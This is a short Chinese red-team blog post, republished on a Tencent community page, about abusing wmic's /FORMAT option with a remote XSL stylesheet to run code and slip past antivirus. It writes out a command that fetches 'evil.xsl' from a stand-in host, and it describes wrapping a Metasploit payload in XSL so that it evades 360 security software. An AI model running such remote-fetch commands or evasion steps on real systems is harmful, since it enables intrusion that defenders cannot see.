Hacking with Style,Stylesheets

前言

前段时间,@subTee放了一个好玩的red team tips,利用wmic来进行bypass。

正文

命令如下

wmic os get /FORMAT:”https://example.com/evil.xsl”

还给了一个demo

我们先利用这个demo试试

发现没问题。

然后我发现有些同学就开始自以为是,以为修改其中的命令就能做到bypass。。。

比如有直接把命令改成木马的

我就想说了,@subTee辛辛苦苦发现这么一个bypass技巧,仅仅是让你把calc改成其他命令的?

那正确操作是什么呢,我们来深入下。

我们看下他的xsl文件格式,发现跟xml格式一样,而且跟之前msxsl的bypass很像。

那我们的目的肯定不是仅仅去执行我们正常就能执行的命令,而是比如能够执行msf payload、mimikatz这种平常被杀软拦截的payload。

首先我们先利用msf生成一个payload

先尝试利用rundll32调用dll试试

拦截,并且把msf.dll杀掉了。

我们来把dll改成我们之前的xsl格式文件

执行看看

看到成功执行,并且绕过了360。

后续

我觉得,这才是@subTee 想让我们看到的,而不是看个表面。

  • 发表于:
  • 原文链接https://kuaibao.qq.com/s/20180531G1XX3400?refer=cp_1026
  • 腾讯「云+社区」是腾讯内容开放平台帐号(企鹅号)传播渠道之一,根据《腾讯内容开放平台服务协议》转载发布内容。
  • 如有侵权,请联系 yunjia_community@tencent.com 删除。

同媒体快讯

扫码关注云+社区

领取腾讯云代金券